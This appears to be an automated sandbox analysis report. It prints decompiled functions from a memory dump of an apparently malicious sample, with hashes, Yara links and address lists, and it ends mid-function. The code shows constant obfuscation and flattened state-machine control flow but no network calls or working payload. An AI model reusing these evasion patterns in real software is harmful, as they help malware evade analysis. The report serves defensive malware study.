API String ID: 0-1414813443
Opcode ID: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
Instruction ID: 166ad5dfaa2aff8007266d51ab8073bceeb9e20790f3c6e77f6e813c996e8bbf
Opcode Fuzzy Hash: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
Instruction Fuzzy Hash: FD41AC715083429BE718DE21C48582BFBE1FBD8718F108A1DF9C996260D7B5CA59CF47

Uniqueness

Uniqueness Score: -1.00%

Function 002460B9, Relevance: 1.4, Strings: 1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E002460B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				void* _t104;
				void* _t109;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t128;

				_push(_a20);
				_t109 = __ecx;
				_t111 = _a16;
				_push(_a16);
				_push(_a12);
				_v44 = 0x104;
				_push(0x104);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(0x104);
				_v8 = 0xaf29;
				_v8 = _v8 >> 0xe;
				_t128 = 0;
				_v8 = _v8 >> 4;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0000662d;
				_v20 = 0xac55;
				_v20 = _v20 | 0x2323cee5;
				_t124 = 0x4c;
				_v20 = _v20 / _t124;
				_v20 = _v20 ^ 0x007629b6;
				_v16 = 0xabf2;
				_v16 = _v16 | 0x220f7c85;
				_v16 = _v16 + 0xffff7509;
				_v16 = _v16 ^ 0x220f51b4;
				_v40 = 0x3232;
				_t125 = 0x1f;
				_v40 = _v40 / _t125;
				_v40 = _v40 ^ 0x00004228;
				_v36 = 0x2ec1;
				_v36 = _v36 | 0xae4e7a63;
				_v36 = _v36 ^ 0xae4e526e;
				_v12 = 0xa12f;
				_v12 = _v12 << 0xe;
				_v12 = _v12 << 0xb;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x00007580;
				_v32 = 0xadd8;
				_v32 = _v32 | 0x6e6f3325;
				_v32 = _v32 ^ 0x5adaef9e;
				_v32 = _v32 ^ 0x34b54fa4;
				_v28 = 0xb293;
				_t126 = 0x3b;
				_v28 = _v28 * 0x2d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0xfb1ed4cf;
				_v24 = 0x2b1c;
				_v24 = _v24 * 6;
				_v24 = _v24 / _t126;
				_v24 = _v24 ^ 0x00001462;
				_t104 = E00247551(_a16, _v24);
				_t127 = _t104;
				if(_t104 != 0) {
					_t128 = E00247663(_v40, _v36, _t127, _t109,  &_v44, _t111, _v12);
					E00254F7D(_v32, _v28, _t127);
				}
				return _t128;
			}

0x002460c2
0x002460c5
0x002460cc
0x002460cf
0x002460d0
0x002460d3
0x002460d6
0x002460d7
0x002460da
0x002460db
0x002460dc
0x002460e1
0x002460ea
0x002460ee
0x002460f0
0x002460f4
0x002460f8
0x002460ff
0x00246106
0x00246112
0x00246117
0x0024611c
0x00246123
0x0024612a
0x00246131
0x00246138
0x0024613f
0x00246149
0x0024614e
0x00246153
0x0024615a
0x00246161
0x00246168
0x0024616f
0x00246176
0x0024617a
0x0024617e
0x00246182
0x00246189
0x00246190
0x00246197
0x0024619e
0x002461a5
0x002461b0
0x002461b4
0x002461b7
0x002461bb
0x002461c2
0x002461cd
0x002461d5
0x002461d8
0x002461eb
0x002461f0
0x002461f7
0x00246211
0x00246217
0x0024621c
0x00246227

Strings

%3on, xrefs: 00246190

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: %3on
API String ID: 2962429428-3639271662
Opcode ID: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
Instruction ID: ad387907fc98c4d7e932983dcf4e232c736d2a8a4dde22936effd123d04a6c05
Opcode Fuzzy Hash: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
Instruction Fuzzy Hash: 83411871E0120AABDB08DFE5C98A8EEFBB5FB44704F208159E911B7250D3B89B55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0024F536, Relevance: 1.3, Strings: 1, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0024F536(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t73;
				signed int _t84;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t73);
				_v28 = _v28 & 0x00000000;
				_v32 = 0x4854b3;
				_v8 = 0xdc0b;
				_t84 = 0x56;
				_v8 = _v8 * 0xf;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x0001e73e;
				_v12 = 0xfbc9;
				_v12 = _v12 + 0xb4de;
				_v12 = _v12 * 0x28;
				_v12 = _v12 ^ 0x0043d2f8;
				_v12 = 0x51f2;
				_v12 = _v12 + 0xffffcc79;
				_v12 = _v12 + 0xffffba87;
				_v12 = _v12 ^ 0xffffb404;
				_v12 = 0x6c9d;
				_v12 = _v12 / _t84;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0000581b;
				_v12 = 0x414e;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 | 0x4fdc2cbe;
				_v12 = _v12 ^ 0x4fdc7af3;
				_v12 = 0xe540;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x1b88e412;
				_v12 = _v12 ^ 0x1bebfc09;
				_v24 = 0x3d7;
				_v24 = _v24 + 0xffffb00b;
				_v24 = _v24 ^ 0xffff901a;
				_v20 = 0xd6b0;
				_v20 = _v20 ^ 0xee2b6cd1;
				_v20 = _v20 ^ 0xee2bf683;
				_v16 = 0x5822;
				_v16 = _v16 + 0xa5f;
				_v16 = _v16 ^ 0x00006b11;
				return E002508F3(_v12, _v24, _v20, _a8, _t84, E0024C506(_t84), _v16);
			}

0x0024f53c
0x0024f53f
0x0024f542
0x0024f543
0x0024f544
0x0024f549
0x0024f550
0x0024f559
0x0024f566
0x0024f567
0x0024f56a
0x0024f56e
0x0024f575
0x0024f57c
0x0024f587
0x0024f58a
0x0024f591
0x0024f598
0x0024f59f
0x0024f5a6
0x0024f5ad
0x0024f5b9
0x0024f5bc
0x0024f5bf
0x0024f5c6
0x0024f5cd
0x0024f5d1
0x0024f5d8
0x0024f5df
0x0024f5ea
0x0024f5ed
0x0024f5f4
0x0024f5fb
0x0024f602
0x0024f609
0x0024f610
0x0024f617
0x0024f61e
0x0024f625
0x0024f62c
0x0024f633
0x0024f65e

Strings

j^ , xrefs: 0024F536

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: j^
API String ID: 0-2773993462
Opcode ID: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
Instruction ID: 30fa461a349b1a75491c97751446276537d269c06830ad0ba806d9d20c9c97b1
Opcode Fuzzy Hash: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
Instruction Fuzzy Hash: 7531E0B4C0070AEBDF48DFA4C98A49EBFB5FB00305F608089D511BA2A0D3B94B959F85

Uniqueness

Uniqueness Score: -1.00%

Function 00255D1D, Relevance: .2, Instructions: 183
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00255D1D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				void* _t165;
				intOrPtr* _t183;
				void* _t185;
				void* _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;

				_t183 = _a24;
				_push(_t183);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t165);
				_v96 = 0x1c20a7;
				_t194 = 0;
				_v84 = _v84 & 0;
				_t199 = _t198 + 0x20;
				_v92 = 0x7c153;
				_v88 = 0xb2086;
				_t185 = 0x2476afb9;
				_v8 = 0x4175;
				_v8 = _v8 + 0xffff57ff;
				_v8 = _v8 | 0xfffbf4ff;
				_v8 = _v8 ^ 0xffffd856;
				_v56 = 0x400d;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x01004a82;
				_v52 = 0xfa4b;
				_t195 = 0x3f;
				_v52 = _v52 * 0xf;
				_v52 = _v52 ^ 0x000ed31b;
				_v48 = 0x532b;
				_v48 = _v48 | 0xa8aca4f9;
				_v48 = _v48 ^ 0xa8acfbbc;
				_v44 = 0x6cab;
				_v44 = _v44 * 0xd;
				_v44 = _v44 ^ 0x0005813c;
				_v32 = 0xa076;
				_v32 = _v32 + 0x7ba7;
				_v32 = _v32 * 0x33;
				_v32 = _v32 ^ 0x0038af53;
				_v28 = 0x80ef;
				_v28 = _v28 << 0xb;
				_v28 = _v28 | 0xbfaa7514;
				_v28 = _v28 ^ 0xbfaf1f10;
				_v24 = 0x2421;
				_v24 = _v24 / _t195;
				_t196 = 3;
				_v24 = _v24 / _t196;
				_v24 = _v24 ^ 0x000050e2;
				_v68 = 0xf6e5;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x0000085c;
				_v64 = 0x7950;
				_v64 = _v64 | 0xc26498fa;
				_v64 = _v64 ^ 0xc264e84e;
				_v60 = 0xb7cc;
				_v60 = _v60 + 0xffffacef;
				_v60 = _v60 ^ 0x0000478a;
				_v40 = 0x6379;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 << 5;
				_v40 = _v40 ^ 0x00006e22;
				_v20 = 0xe665;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0xe4ef8652;
				_v20 = _v20 + 0xffffeafe;
				_v20 = _v20 ^ 0xe52339cd;
				_v80 = 0x4d1e;
				_v80 = _v80 + 0xffffc710;
				_v80 = _v80 ^ 0x000046ed;
				_v16 = 0x18c;
				_v16 = _v16 >> 4;
				_t197 = _v80;
				_v16 = _v16 * 0x41;
				_v16 = _v16 ^ 0x73128289;
				_v16 = _v16 ^ 0x7312c7aa;
				_v12 = 0xdd0b;
				_v12 = _v12 + 0xffff65de;
				_v12 = _v12 * 0x3b;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x0f6bc641;
				_v76 = 0xf5b7;
				_v76 = _v76 ^ 0xdca6f1c9;
				_v76 = _v76 ^ 0xdca64fd3;
				_v36 = 0xdf9f;
				_v36 = _v36 + 0x7ffe;
				_v36 = _v36 + 0x4fda;
				_v36 = _v36 ^ 0x00019ee0;
				_v72 = 0x5c39;
				_v72 = _v72 ^ 0x85106c7e;
				_v72 = _v72 ^ 0x85105bd4;
				do {
					while(_t185 != 0x6efb3d4) {
						if(_t185 == 0xfd0cdc7) {
							_t197 = E002596CB(_t185, _v8, _v56, _v52, _a20, _v48, 0, _v44, _v32, _a12, _t185, _a16, 0, _v28, _v24);
							_t199 = _t199 + 0x38;
							if(_t197 == 0) {
								L15:
								return _t194;
							}
							_t185 = 0x6efb3d4;
							continue;
						}
						if(_t185 == 0x1eddc4e8) {
							E002596CB(_t185, _v40, _v20, _v80, _a20, _v16, _t197, _v12, _v76, _a12, _t185, _a16, _t194, _v36, _v72);
							if(_t183 != 0) {
								 *_t183 = _t197;
							}
							goto L15;
						}
						if(_t185 != 0x2476afb9) {
							goto L11;
						}
						_t185 = 0xfd0cdc7;
					}
					_push(_t185);
					_push(_t185);
					_t194 = E00248736(_t197);
					if(_t194 == 0) {
						_t185 = 0x710c028;
						goto L11;
					}
					_t185 = 0x1eddc4e8;
					continue;
					L11:
				} while (_t185 != 0x710c028);
				goto L15;
			}

0x00255d24
0x00255d29
0x00255d2a
0x00255d2d
0x00255d30
0x00255d33
0x00255d36
0x00255d3a
0x00255d3b
0x00255d40
0x00255d47
0x00255d49
0x00255d4c
0x00255d4f
0x00255d58
0x00255d5f
0x00255d64
0x00255d6b
0x00255d72
0x00255d79
0x00255d80
0x00255d87
0x00255d8b
0x00255d92
0x00255d9f
0x00255da2
0x00255da5
0x00255dac
0x00255db3
0x00255dba
0x00255dc1
0x00255dcc
0x00255dcf
0x00255dd6
0x00255ddd
0x00255de8
0x00255deb
0x00255df2
0x00255df9
0x00255dfd
0x00255e04
0x00255e0b
0x00255e19
0x00255e1f
0x00255e22
0x00255e25
0x00255e2c
0x00255e33
0x00255e37
0x00255e3e
0x00255e45
0x00255e4c
0x00255e53
0x00255e5a
0x00255e61
0x00255e68
0x00255e6f
0x00255e73
0x00255e77
0x00255e7e
0x00255e85
0x00255e89
0x00255e90
0x00255e97
0x00255e9e
0x00255ea5
0x00255eac
0x00255eb3
0x00255eba
0x00255ec2
0x00255ec5
0x00255ec8
0x00255ecf
0x00255ed6
0x00255edd
0x00255ee8
0x00255eeb
0x00255eef
0x00255ef6
0x00255efd
0x00255f04
0x00255f0b
0x00255f12
0x00255f19
0x00255f20
0x00255f27
0x00255f2e
0x00255f35
0x00255f3c
0x00255f3c
0x00255f4a
0x00255f92
0x00255f94
0x00255f99
0x0025600b
0x00256013
0x00256013
0x00255f9b
0x00000000
0x00255f9b
0x00255f52
0x00255ffd
0x00256007
0x00256009
0x00256009
0x00000000
0x00256007
0x00255f5e
0x00000000
0x00000000
0x00255f60
0x00255f60
0x00255fab
0x00255fac
0x00255fb4
0x00255fba
0x00255fc6
0x00000000
0x00255fc6
0x00255fbc
0x00000000
0x00255fcb
0x00255fcb
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
Instruction ID: 5a8a286b5554fc76e0bd5a50b552db3f72afc051e930f7d5abf9ed7320f26ecf
Opcode Fuzzy Hash: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
Instruction Fuzzy Hash: 95913772C1021AABDF15CFE5D9895EEBFB5FF04314F208109E611762A0D3B90A65CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00250F0C, Relevance: .2, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00250F0C(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t132;
				signed int _t149;
				void* _t152;
				void* _t154;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t181;

				_push(_a20);
				_t152 = __edx;
				_push(0xffffffff);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t132);
				_v44 = 0x160;
				_t181 = _t180 + 0x1c;
				_v44 = _v44 ^ 0x1b432315;
				_v44 = _v44 ^ 0x1b433d06;
				_t179 = 0;
				_v12 = 0x3352;
				_t154 = 0x2476afb9;
				_v12 = _v12 + 0xffffca9f;
				_v12 = _v12 << 1;
				_t173 = 0x29;
				_v12 = _v12 / _t173;
				_v12 = _v12 ^ 0x063e5c60;
				_v8 = 0x701a;
				_t174 = 0x52;
				_v8 = _v8 / _t174;
				_t175 = 0x4e;
				_v8 = _v8 / _t175;
				_t176 = 0x41;
				_v8 = _v8 / _t176;
				_v8 = _v8 ^ 0x0000431a;
				_v40 = 0xf48c;
				_v40 = _v40 + 0xffff0dc2;
				_v40 = _v40 ^ 0x0000090f;
				_v36 = 0x5475;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0x2a3aa88b;
				_v16 = 0xfc71;
				_v16 = _v16 ^ 0x0a975394;
				_v16 = _v16 | 0x3f9daa18;
				_v16 = _v16 + 0xffff523a;
				_v16 = _v16 ^ 0x3f9f63b5;
				_v48 = 0xbfc9;
				_t177 = 0x63;
				_v48 = _v48 / _t177;
				_v48 = _v48 ^ 0x0000151a;
				_v32 = 0xfc2a;
				_v32 = _v32 | 0x12ce1451;
				_v32 = _v32 + 0x3ff4;
				_v32 = _v32 ^ 0x12cf51f6;
				_v56 = 0x5ac8;
				_v56 = _v56 | 0xf85dcbd1;
				_v56 = _v56 ^ 0xf85dd81d;
				_v52 = 0x6e3;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x0006be09;
				_v28 = 0x1612;
				_v28 = _v28 ^ 0x471c56e0;
				_v28 = _v28 >> 1;
				_v28 = _v28 + 0xffff1cc1;
				_v28 = _v28 ^ 0x238d2d3e;
				_v24 = 0x515e;
				_v24 = _v24 + 0x963f;
				_v24 = _v24 + 0xffff7349;
				_t178 = _v56;
				_v24 = _v24 * 0x11;
				_v24 = _v24 ^ 0x000650d8;
				_v20 = 0x1a04;
				_v20 = _v20 | 0x2258a5ab;
				_v20 = _v20 + 0xffff2fa3;
				_v20 = _v20 + 0x9894;
				_v20 = _v20 ^ 0x2258a793;
				do {
					while(_t154 != 0x6efb3d4) {
						if(_t154 == 0xfd0cdc7) {
							_t149 = E00257AFD(_v44, _v12, _t154, _v8, 0, _t152, 0, 0xffffffff, _v40, _v36, _a12);
							_t178 = _t149;
							_t181 = _t181 + 0x24;
							if(_t149 != 0) {
								_t154 = 0x6efb3d4;
								continue;
							}
						} else {
							if(_t154 == 0x1eddc4e8) {
								E00257AFD(_v56, _v52, _t154, _v28, _t179, _t152, _t178, 0xffffffff, _v24, _v20, _a12);
							} else {
								if(_t154 != 0x2476afb9) {
									goto L11;
								} else {
									_t154 = 0xfd0cdc7;
									continue;
								}
							}
						}
						L14:
						return _t179;
					}
					_push(_t154);
					_push(_t154);
					_t179 = E00248736(_t178 + _t178);
					if(_t179 == 0) {
						_t154 = 0x710c028;
						goto L11;
					} else {
						_t154 = 0x1eddc4e8;
						continue;
					}
					goto L14;
					L11:
				} while (_t154 != 0x710c028);
				goto L14;
			}

0x00250f15
0x00250f18
0x00250f1a
0x00250f1c
0x00250f1f
0x00250f22
0x00250f24
0x00250f25
0x00250f26
0x00250f2b
0x00250f32
0x00250f35
0x00250f3e
0x00250f45
0x00250f47
0x00250f4e
0x00250f53
0x00250f5a
0x00250f62
0x00250f67
0x00250f6c
0x00250f73
0x00250f7d
0x00250f82
0x00250f8a
0x00250f8f
0x00250f97
0x00250f9c
0x00250fa1
0x00250fa8
0x00250faf
0x00250fb6
0x00250fbd
0x00250fc4
0x00250fc8
0x00250fcf
0x00250fd6
0x00250fdd
0x00250fe4
0x00250feb
0x00250ff2
0x00250ffc
0x00250fff
0x00251002
0x00251009
0x00251010
0x00251017
0x0025101e
0x00251025
0x0025102c
0x00251033
0x0025103a
0x00251041
0x00251045
0x0025104c
0x00251053
0x0025105a
0x0025105d
0x00251064
0x0025106b
0x00251072
0x00251079
0x00251084
0x00251087
0x0025108a
0x00251091
0x00251098
0x0025109f
0x002510a6
0x002510ad
0x002510b4
0x002510b4
0x002510c2
0x002510f5
0x002510fa
0x002510fc
0x00251101
0x00251103
0x00000000
0x00251103
0x002510c4
0x002510ca
0x00251157
0x002510cc
0x002510d2
0x00000000
0x002510d4
0x002510d4
0x00000000
0x002510d4
0x002510d2
0x002510ca
0x00251160
0x00251167
0x00251167
0x00251113
0x00251114
0x0025111d
0x00251123
0x0025112c
0x00000000
0x00251125
0x00251125
0x00000000
0x00251125
0x00000000
0x00251131
0x00251131
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
Instruction ID: b080dcf2474937c61f4d99698eaf314767f15a48ce5c3a162d6b45b288a43199
Opcode Fuzzy Hash: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
Instruction Fuzzy Hash: 83618D72D1030AEBDF18CFA5C9859EEBBB2FF44310F248259E912B6290D3B54E558F90

Uniqueness

Uniqueness Score: -1.00%

Function 0024F444, Relevance: .1, Instructions: 128
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0024F444(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t120;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				intOrPtr* _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				void* _t159;
				void* _t160;

				_t128 = __ecx;
				_t152 =  *0x25ca24; // 0x0
				while(_t152 != 0) {
					if( *((intOrPtr*)(_t152 + 0x28)) != 0) {
						 *((intOrPtr*)(_t152 + 4))( *((intOrPtr*)(_t152 + 0x28)), 0xb, 0);
					}
					_t152 =  *((intOrPtr*)(_t152 + 0x2c));
				}
				_t129 = _t128 | 0xffffffff;
				_pop(_t153);
				_t160 = _t159 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_t126 = _t129;
				_t149 = 0x25ca24;
				_t130 = 0x77;
				_v8 = _v8 / _t130;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_t131 = 0x67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / _t131;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t154 =  *0x25ca24; // 0x0
				while(_t154 != 0) {
					if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
						L10:
						 *_t149 =  *((intOrPtr*)(_t154 + 0x2c));
						_t120 = E0024F536(_v20, _v40, _v48, _t154);
					} else {
						_t120 = E0025086F(_v8, _v44,  *((intOrPtr*)(_t154 + 0x1c)), _t126, _v24);
						_t160 = _t160 + 0xc;
						if(_t120 != _v28) {
							_t112 = _t154 + 0x2c; // 0x2c
							_t149 = _t112;
						} else {
							 *((intOrPtr*)(_t154 + 4))( *((intOrPtr*)(_t154 + 0x28)), 0, 0);
							E0025422C(_v12,  *((intOrPtr*)(_t154 + 0x28)), _v32);
							E00254F7D(_v36, _v16,  *((intOrPtr*)(_t154 + 0x1c)));
							goto L10;
						}
					}
					_t154 =  *_t149;
				}
				return _t120;
			}

0x0024f444
0x0024f445
0x0024f460
0x0024f451
0x0024f45a
0x0024f45a
0x0024f45d
0x0024f45d
0x0024f464
0x0024f467
0x002598a6
0x002598a9
0x002598b2
0x002598c1
0x002598c3
0x002598c8
0x002598cd
0x002598d2
0x002598d6
0x002598dd
0x002598e8
0x002598e9
0x002598ec
0x002598f3
0x002598fa
0x00259901
0x00259905
0x0025990c
0x00259913
0x0025991c
0x0025991f
0x00259926
0x0025992d
0x00259934
0x00259937
0x0025993b
0x00259942
0x00259949
0x0025994d
0x00259951
0x00259958
0x0025995f
0x00259966
0x0025996a
0x00259971
0x00259978
0x0025997f
0x00259986
0x0025998d
0x00259994
0x0025999b
0x002599a6
0x002599a9
0x002599b0
0x002599b7
0x002599be
0x002599c1
0x002599c8
0x002599cf
0x002599d3
0x002599d7
0x002599de
0x00259a46
0x002599ea
0x00259a2e
0x00259a3b
0x00259a3d
0x002599ec
0x002599f9
0x002599fe
0x00259a04
0x00259a51
0x00259a51
0x00259a06
0x00259a0d
0x00259a19
0x00259a27
0x00000000
0x00259a2d
0x00259a04
0x00259a44
0x00259a44
0x00259a50

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfbdeed3124bd50057cc1f0dc7c1710ab00d8b0a7be7af4ad7c635dca87b1874
Instruction ID: 47139db0499f099d65dcccfc8308518dd3984d2b6c177fde68e93cc5778b9313
Opcode Fuzzy Hash: bfbdeed3124bd50057cc1f0dc7c1710ab00d8b0a7be7af4ad7c635dca87b1874
Instruction Fuzzy Hash: 63515731D00709DFDB18CFA5D94A9DEFBB0FB08318F208159D915762A0C7B46A99CF98

Uniqueness

Uniqueness Score: -1.00%

Function 002571EF, Relevance: .1, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002571EF(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v68;
				char _v144;
				void* __ecx;
				void* _t94;
				void* _t106;
				void* _t108;
				void* _t110;
				void* _t112;
				void* _t114;
				signed int _t120;
				void* _t142;
				void* _t144;
				void* _t146;
				void* _t147;

				_t147 = __eflags;
				_push(_a4);
				_push(__edx);
				E0024602B(_t94);
				_v20 = 0xa5d0;
				_v20 = _v20 | 0x3487ecbd;
				_v20 = _v20 + 0xffff03d0;
				_t142 = 0;
				_v20 = _v20 + 0x3a47;
				_v20 = _v20 ^ 0x348731c7;
				_v28 = 0xdd31;
				_v28 = _v28 << 0x10;
				_v28 = _v28 | 0x8f0862d8;
				_v28 = _v28 ^ 0xdf391de9;
				_v16 = 0xb0e;
				_v16 = _v16 << 4;
				_v16 = _v16 << 0xa;
				_t120 = 0x14;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x461d447c;
				_v12 = 0xa74;
				_v12 = _v12 << 0xc;
				_v12 = _v12 + 0x835b;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0053bc14;
				_v36 = 0xa6cf;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x000104b7;
				_v24 = 0x4d22;
				_v24 = _v24 >> 6;
				_v24 = _v24 + 0xef2f;
				_v24 = _v24 ^ 0x0000ed15;
				_v44 = 0x3931;
				_v44 = _v44 * 0x11;
				_v44 = _v44 ^ 0x00039362;
				_v40 = 0xec47;
				_v40 = _v40 ^ 0x28f00c99;
				_v40 = _v40 ^ 0x28f09017;
				_v32 = 0x2800;
				_v32 = _v32 / _t120;
				_v32 = _v32 ^ 0x971b94ed;
				_v32 = _v32 ^ 0x971b9d0a;
				E002550F2( &_v144, _v20, _v28, _v16, __edx);
				_t146 = _t144 + 0x18;
				L13:
				if(E0024B055(_v12, _v36, _t147,  &_v144,  &_v68) != 0) {
					_t106 = E00241280(_v24, _v44, _v40,  &_v60,  &_v68, _v32);
					_t146 = _t146 + 0x10;
					__eflags = _t106;
					if(__eflags != 0) {
						_t108 = _v56 - 1;
						__eflags = _t108;
						if(_t108 == 0) {
							E00246754(_v60,  &_v52);
						} else {
